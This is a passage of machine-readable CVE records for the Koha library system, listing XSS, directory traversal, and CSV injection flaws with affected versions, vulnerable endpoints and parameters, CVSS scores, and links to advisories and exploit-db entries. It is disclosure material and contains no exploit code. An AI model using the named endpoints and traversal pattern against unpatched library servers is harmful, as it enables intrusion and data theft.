              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4633",
    "datePublished": "2018-10-18T20:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.102Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-4631 (GCVE-0-2015-4631)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
CWE
  • n/a
Summary
Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.212Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "name": "37389",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/37389/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
        },
        {
          "name": "37389",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/37389/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
        },
        {
          "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-18-8/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4631",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple cross-site scripting (XSS) vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to inject arbitrary web script or HTML via the (1) tag parameter to opac-search.pl; the (2) value parameter to authorities/authorities-home.pl; the (3) delay parameter to acqui/lateorders.pl; the (4) authtypecode or (5) tagfield to admin/auth_subfields_structure.pl; the (6) tagfield parameter to admin/marc_subfields_structure.pl; the (7) limit parameter to catalogue/search.pl; the (8) bookseller_filter, (9) callnumber_filter, (10) EAN_filter, (11) ISSN_filter, (12) publisher_filter, or (13) title_filter parameter to serials/serials-search.pl; or the (14) author, (15) collectiontitle, (16) copyrightdate, (17) isbn, (18) manageddate_from, (19) manageddate_to, (20) publishercode, (21) suggesteddate_from, or (22) suggesteddate_to parameter to suggestion/suggestion.pl; or the (23) direction, (24) display or (25) addshelf parameter to opac-shelves.pl."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14418"
            },
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "37389",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/37389/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14423"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4631",
    "datePublished": "2018-10-18T20:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.212Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-1923 (GCVE-0-2014-1923)
Vulnerability from cvelistv5
Published
2020-01-24 16:42
Modified
2024-08-06 09:58
Severity ?
CWE
  • n/a
Summary
Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T09:58:15.695Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://koha-community.org/security-release-february-2014/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-02-07T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-01-24T16:42:42",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://koha-community.org/security-release-february-2014/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-1923",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://koha-community.org/security-release-february-2014/",
              "refsource": "MISC",
              "url": "http://koha-community.org/security-release-february-2014/"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/07/10",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
            },
            {
              "name": "http://www.openwall.com/lists/oss-security/2014/02/10/3",
              "refsource": "MISC",
              "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
            },
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661",
              "refsource": "MISC",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
            },
            {
              "name": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662",
              "refsource": "MISC",
              "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-1923",
    "datePublished": "2020-01-24T16:42:42",
    "dateReserved": "2014-02-09T00:00:00",
    "dateUpdated": "2024-08-06T09:58:15.695Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-24337 (GCVE-0-2024-24337)
Vulnerability from cvelistv5
Published
2024-02-12 00:00
Modified
2025-09-29 14:22
CWE
  • n/a
Summary
CSV Injection vulnerability in '/members/moremember.pl' and '/admin/aqbudgets.pl' endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to inject DDE commands into csv exports via the 'Budget' and 'Patrons Member' components.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:19:52.558Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:koha-community:koha_library_software:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "koha_library_software",
            "vendor": "koha-community",
            "versions": [
              {
                "lessThanOrEqual": "23.05.05",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 8.8,
              "baseSeverity": "HIGH",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "REQUIRED",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-24337",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-08-26T18:28:30.058045Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-1236",
                "description": "CWE-1236 Improper Neutralization of Formula Elements in a CSV File",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-08-26T18:33:32.019Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "CSV Injection vulnerability in \u0027/members/moremember.pl\u0027 and \u0027/admin/aqbudgets.pl\u0027 endpoints in Koha Library Management System version 23.05.05 and earlier allows attackers to to inject DDE commands into csv exports via the \u0027Budget\u0027 and \u0027Patrons Member\u0027 components."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-09-29T14:22:32.206Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://nitipoom-jar.github.io/CVE-2024-24337/"
        },
        {
          "url": "https://nitipoom-jaroonchaipipat.github.io/security-research-portal/2024-24337"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-24337",
    "datePublished": "2024-02-12T00:00:00.000Z",
    "dateReserved": "2024-01-25T00:00:00.000Z",
    "dateUpdated": "2025-09-29T14:22:32.206Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2015-4632 (GCVE-0-2015-4632)
Vulnerability from cvelistv5
Published
2018-10-18 20:00
Modified
2024-08-06 06:18
Severity ?
CWE
  • n/a
Summary
Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T06:18:12.033Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-16-12/"
          },
          {
            "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-18-8/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/security-release-koha-3-20-1/"
          },
          {
            "name": "37388",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/37388/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://koha-community.org/koha-3-14-16-released/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-06-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-18T19:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-16-12/"
        },
        {
          "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-18-8/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/security-release-koha-3-20-1/"
        },
        {
          "name": "37388",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/37388/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://koha-community.org/koha-3-14-16-released/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2015-4632",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html",
              "refsource": "MISC",
              "url": "https://packetstormsecurity.com/files/132458/Koha-ILS-3.20.x-CSRF-XSS-Traversal-SQL-Injection.html"
            },
            {
              "name": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/",
              "refsource": "MISC",
              "url": "https://www.sba-research.org/2015/06/24/researchers-of-sba-research-found-several-critical-security-vulnerabilities-in-the-koha-library-software-via-combinatorial-testing/"
            },
            {
              "name": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408",
              "refsource": "CONFIRM",
              "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-16-12/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-16-12/"
            },
            {
              "name": "20150625 SBA Research Vulnerability Disclosure - Multiple Critical Vulnerabilities in Koha ILS",
              "refsource": "FULLDISC",
              "url": "https://seclists.org/fulldisclosure/2015/Jun/80"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-18-8/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-18-8/"
            },
            {
              "name": "https://koha-community.org/security-release-koha-3-20-1/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/security-release-koha-3-20-1/"
            },
            {
              "name": "37388",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/37388/"
            },
            {
              "name": "https://koha-community.org/koha-3-14-16-released/",
              "refsource": "CONFIRM",
              "url": "https://koha-community.org/koha-3-14-16-released/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-4632",
    "datePublished": "2018-10-18T20:00:00",
    "dateReserved": "2015-06-16T00:00:00",
    "dateUpdated": "2024-08-06T06:18:12.033Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-28740 (GCVE-0-2024-28740)
Vulnerability from cvelistv5
Published
2024-08-06 00:00
Modified
2024-08-21 17:34
CWE
  • n/a
Summary
Cross Site Scripting vulnerability in Koha ILS 23.05 and before allows a remote attacker to execute arbitrary code via the additional-contents.pl component.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "koha",
            "vendor": "koha",
            "versions": [
              {
                "lessThanOrEqual": "23.05",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "NONE",
              "baseScore": 6.1,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "LOW",
              "integrityImpact": "LOW",
              "privilegesRequired": "NONE",
              "scope": "CHANGED",
              "userInteraction": "REQUIRED",
